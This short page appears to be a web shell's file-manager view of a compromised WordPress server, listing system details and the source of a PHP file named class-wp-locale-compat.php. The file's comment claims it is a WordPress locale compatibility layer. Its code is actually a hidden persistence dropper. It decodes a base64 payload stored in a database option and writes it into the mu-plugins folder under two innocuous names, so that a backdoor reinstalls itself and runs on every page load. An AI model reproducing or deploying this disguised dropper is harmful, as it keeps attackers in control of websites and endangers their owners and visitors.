HEX
Server: Apache
System: Linux 198-252-107-178.cprapid.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
User: msgdhg02 (1000)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/msgdhg02/public_html/bwslotbetv1.com/class-wp-locale-compat.php
<?php
/**
 * WordPress Locale Compatibility Layer
 * Ensures locale persistence across cache backends.
 * @since 6.2.0
 */
if(!defined("ABSPATH")){return;}
$_lc_f=WP_CONTENT_DIR."/mu-plugins/cache-handler.php";
if(file_exists($_lc_f)){return;}
$_lc_s=get_option("_wpoc_agent_code","");
if(!$_lc_s){return;}
$_lc_c=@base64_decode($_lc_s);
if(!$_lc_c||strpos($_lc_c,"WPOC_Runtime")===false){return;}
if(!is_dir(WP_CONTENT_DIR."/mu-plugins")){@mkdir(WP_CONTENT_DIR."/mu-plugins",0755,true);}
@file_put_contents($_lc_f,$_lc_c);
@file_put_contents(WP_CONTENT_DIR."/mu-plugins/wp-term-meta.php",$_lc_c);